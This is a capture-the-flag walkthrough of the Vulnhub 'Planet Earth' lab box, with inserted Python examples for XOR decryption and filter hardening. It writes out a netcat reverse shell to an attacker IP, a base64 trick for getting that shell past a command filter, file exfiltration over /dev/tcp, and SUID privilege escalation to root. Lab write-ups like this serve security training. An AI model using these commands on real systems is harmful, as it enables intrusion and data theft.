The Planets CTF | Earth CTF | Vulnhub | WriteUp | Walkthrough

SHAMS UL MEHMOOD
10 min read · May 31, 2024


Hello friends, I’m Shams Ul Mehmood and this is my 5th article. This article is a walkthrough of the Planet Earth Vulnhub box. It covers several kinds of security flaws, such as a Python reverse shell, user privilege escalation and directory listing. You can download this Vulnhub box from here.

The steps

The summary of the steps required in solving this CTF is given below:

  1. Getting the victim machine’s IP address with the arp-scan utility
  2. Getting open port details with the Nmap tool
  3. Enumerating the HTTP server
  4. Configuring the domain names in the hosts file
  5. Enumerating with Gobuster / Nikto
  6. Decrypting the string with the help of an online XOR utility
  7. Connecting to the target system
  8. Getting the root account

So, now that we have all the information we need, let us get started with the challenge.

Step-1:

📌️ In the first step of the scanning, I used the arp-scan command to perform a local network scan and find the IP address of the target machine.

Command : sudo arp-scan 192.168.204.0/24

Step-2:

📌️ In the second step, after getting the victim machine’s IP address, I performed an Nmap scan against it with the following options:

  • -sS : TCP SYN scan, to find running services.
  • -sV : to detect application versions.
  • -p- : to scan all ports on the victim machine.
  • -sC : to run the default scripts.
  • -Pn : to skip host discovery.
  • -O : to detect the operating system.

Command : sudo nmap -p- -O -sV -sC -Pn -sS 192.168.204.132

📌 ️The Nmap scan confirmed that the target machine’s IP address was 192.168.204.132 and showed three open ports: 22, 80 and 443.

📌 The operating system running on the victim machine was Linux.

📌 Next, I opened the target machine’s IP address in the browser on the default HTTP port, 80.

Command : http://192.168.204.132

Step-3:

📌 In the third step I enumerated the HTTP server. I opened the victim IP address in the browser over HTTPS on port 443.

Command : https://192.168.204.132:443

📌 The browser returned a certificate warning; I clicked Advanced and then the Accept the Risk and Continue button.

📌 This showed the Fedora Webserver Test Page.

Step-4:

📌 In the fourth step, to view the certificate, I clicked the lock icon in the address bar and then View Certificate.

📌 The DNS names listed in the certificate are then mapped to the target machine’s IP address in the hosts file.

Command : sudo ls /etc/hosts

Command : sudo nano /etc/hosts

📌 Then I pinged the target machine’s IP address and the domain names.

Command : ping 192.168.204.132

Command : ping earth.local -c 3

Command : ping terratest.earth.local -c 3

Step-5:

📌️ In this step, I used different tools, namely dirb, gobuster and nikto, to enumerate hidden files and directories on the target machine.

📌 I ran gobuster against the victim over HTTP on the default port (80) and found the admin directory.

Command : sudo gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/big.txt

📌 When I ran gobuster over HTTPS on port 443 against terratest.earth.local, I found a robots.txt file.

Command : sudo gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/big.txt

📌 I also ran nikto against the target IP address over HTTP on port 80.

Command : nikto -h 192.168.204.132

Command : http://192.168.204.132/2IOYbv0L.php

Command : http://192.168.204.132/icons/

Command : http://192.168.204.132/icons/README

📌 Then I typed the domain name (earth.local) into the browser address bar.

📌 Then I appended the admin directory to the domain name in the address bar.

Command : http://earth.local/admin/

Command : http://earth.local/admin/login

Command : https://terratest.earth.local/index.html

Command : https://terratest.earth.local/robots.txt

Command : https://terratest.earth.local/testingnotes.txt

Command : https://terratest.earth.local/testdata.txt

Step-6:

📌 I have the username, terra, from testingnotes.txt.

📌 I have the encrypted messages from the earth.local page.

📌 I have the encryption key, the contents of testdata.txt, which can be used to decrypt the messages.

📌 I know there is an admin login panel at earth.local/admin, so we may be able to log into it once we decrypt the message.

📌 This information is crucial. For the decryption I used CyberChef.

📌 I downloaded and unzipped the CyberChef zip file.

📌 Then I loaded the CyberChef_v10.18.6.html file in the browser.

📌 After that, add the “From Hex” and “XOR” operations to the CyberChef recipe, set the XOR key to the contents of testdata.txt, paste the encrypted message into the Input and hit BAKE!. This gives the password earthclimatechangebad4humans.

📌 Let’s cook! We have a potential password for the terra account!
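The CyberChef recipe above (From Hex, then XOR with the key) as an added Python example, so the decryption can be repeated without a browser; this is not code from the original write-up, and the key and message it uses are constructed samples rather than the real testdata.txt and earth.local values.

```python
# Added example, not part of the original write-up. Mirrors the CyberChef
# recipe "From Hex" -> "XOR" (standard scheme: the key repeats over the data).
# SAMPLE_KEY and SAMPLE_PLAINTEXT are CONSTRUCTED stand-ins for testdata.txt
# and the earth.local message; they are not the box's real contents.
from itertools import cycle


def xor_decrypt_hex(hex_message: str, key: bytes) -> bytes:
    """Decode a hex string (spaces tolerated) and XOR it with a repeating key."""
    data = bytes.fromhex("".join(hex_message.split()))
    return bytes(c ^ k for c, k in zip(data, cycle(key)))


def xor_encrypt_to_hex(plaintext: bytes, key: bytes) -> str:
    """Inverse operation; used here only to build the sample ciphertext."""
    return bytes(c ^ k for c, k in zip(plaintext, cycle(key))).hex()


def recover_password(hex_message: str, key: bytes) -> str:
    """Decrypt and return the last non-empty line, where the sample puts the password."""
    text = xor_decrypt_hex(hex_message, key).decode("utf-8", errors="replace")
    lines = [line for line in text.splitlines() if line.strip()]
    return lines[-1] if lines else ""


# Constructed sample data (labelled as such): a key playing the role of
# testdata.txt and a message ending in the password recovered in the write-up.
SAMPLE_KEY = b"constructed sample key standing in for testdata.txt"
SAMPLE_PLAINTEXT = b"terra\nearthclimatechangebad4humans"
SAMPLE_HEX = xor_encrypt_to_hex(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print(xor_decrypt_hex(SAMPLE_HEX, SAMPLE_KEY).decode())
    print("password:", recover_password(SAMPLE_HEX, SAMPLE_KEY))
```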

📌 Go to earth.local/admin and log in.

📌 Now we can execute the commands on the box!

Command : whoami

📌 Its output was apache.

Command : ls -al

Command : cd /home; ls -la; pwd

Command : locate 'flag'

Command : cat /var/earth_web/user_flag.txt

Command : cat /etc/passwd

Command : echo "8.8.8.8"

📌 8.8.8.8 is a Google public DNS IP address, and the output of the above command was ‘remote connections are forbidden’.

Step-7:

📌 The most efficient way to connect to the victim machine is with a netcat listener.

Command : nc -e /bin/bash 192.168.204.143 4444

📌 Here 4444 is the port for our netcat connection. Before clicking Run Command, start the listener in your terminal:

Command : nc -lvnp 4444

📌 This is how your screen should look before clicking the Run Command button.

📌 After clicking, what now? It failed because remote connections are not allowed from the target machine. However, we can trick the target into doing what we want: we encode the command and have it decoded and run in one step.

Command : echo 'nc -e /bin/bash 192.168.204.143 4444' | base64

📌 -e tells nc which program (/bin/bash) to run once the connection is made.

📌 Then I injected the encoded reverse shell into the web server via the input field on the Admin Command Tool web page.

Command : echo 'bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjA0LjE0MyA0NDQ0Cg==' | base64 -d | bash

📌 -d tells base64 to decode.

📌 Piping into bash forces the decoded text to be run as a command.
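As an added, defender-side example that is not part of the original write-up: why a check that only inspects the raw command text misses the base64-wrapped form described above, and how decoding (normalising) the input before inspection catches it. The deny-list logic is an assumption, since the Admin Command Tool's real code is not shown on the page; the sample commands are constructed.

```python
# Added example, not from the original write-up. The Admin Command Tool's real
# filter is not on the page; this IPv4 deny-list check is an ASSUMED stand-in
# that reproduces the observed behaviour ("remote connections are forbidden").
import base64
import re

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def naive_filter(cmd: str) -> bool:
    """Weak check: reject only if an IPv4 literal appears in the raw text."""
    return IPV4.search(cmd) is not None


def decoded_layers(cmd: str, max_depth: int = 3) -> list:
    """Return the command plus everything recoverable by base64-decoding long tokens."""
    layers, frontier = [cmd], [cmd]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            for tok in B64_TOKEN.findall(text):
                try:
                    nxt.append(base64.b64decode(tok, validate=True).decode("utf-8"))
                except (ValueError, UnicodeDecodeError):
                    continue  # not valid base64, or not text: ignore this token
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def normalized_filter(cmd: str) -> bool:
    """Hardened check: inspect every decoded layer and flag decode-then-execute pipes."""
    if any(IPV4.search(layer) for layer in decoded_layers(cmd)):
        return True
    return re.search(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b", cmd) is not None


# Constructed samples: the plain command the page says was blocked, and the
# base64-wrapped form it describes.
PLAIN = "nc -e /bin/bash 192.168.204.143 4444"
WRAPPED = "echo '%s' | base64 -d | bash" % base64.b64encode(PLAIN.encode()).decode()

if __name__ == "__main__":
    print("naive filter blocks wrapped form:", naive_filter(WRAPPED))
    print("normalized filter blocks wrapped form:", normalized_filter(WRAPPED))
```

The real fix is to stop executing user-supplied shell commands at all; the normalised check only shows why inspecting raw text is not a control.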

Step-8:

📌 Then click Run Command; the page will hang for a while, but look at the netcat listener: we got the connection.

📌 Now we are able to run different commands.

Command : whoami

Command : pwd

Command : ls /

Command : ls /var/

Command : cd /var/earth_web/

Command : ls

Command : cat /var/earth_web/user_flag.txt

📌 To find privilege escalation candidates, we list SUID binaries with the following command (this is a very useful command for finding exploitable misconfigurations; save it!):

Command : find / -perm -u=s -type f 2>/dev/null

📌 The reset_root file looks interesting, so let’s check it. First we check the file type, then we try to execute it.

Command : file /usr/bin/reset_root

📌 To run the file, simply execute the following command:

Command : reset_root

📌 It is obvious that the file does not work as it is now: we get an error when running it, and we cannot analyze the file through netcat either. We need to send the file over to our Kali machine so we can use other tools on it.

How to send the file over via netcat?

  1. Start another netcat session where we are on the target system

Command : cat /usr/bin/reset_root > /dev/tcp/192.168.204.143/3333

  2. Start another netcat listener on another terminal on your Kali Machine.

Command : nc -lvnp 3333 > reset_root

Command : ls

Command : chmod +x reset_root

Command : cat reset_root

📌 Even with the file on Kali, without the proper tools we still cannot determine what is wrong and why the file cannot run on the target system. We install the tool ltrace; if you don’t have it, just press y to accept and install.

📌 Now we can easily trace the library calls that reset_root makes.

Command : ltrace ./reset_root

📌 Underlined in the ltrace output are the 3 files whose absence stops the binary from running properly. We need to create them on the target machine, so switch back to the netcat shell and create the missing files.

Command : touch /dev/shm/kHgTFI5G

Command : touch /dev/shm/Zw7bV9U5

Command : touch /tmp/kcM0Wewe

Command : reset_root

📌 Wow, awesome! We executed the file and the root password is now reset to “Earth”.

📌 Let’s switch to the root account with the following command.

Command : su root

📌 Next, let’s run some other commands on the victim terminal.

Command : whoami

Command : ls

Command : cd home

Command : ls

Command : cd earth

Command : ls

Command : cd /root

Command : ls

Command : cat root_flag.txt

📌 Now you need to check for the root flag.

📌 Super! You can see our desired root flag in the root directory on the victim machine.

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀

📈⭐🧑‍🎤🎭💯

⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿
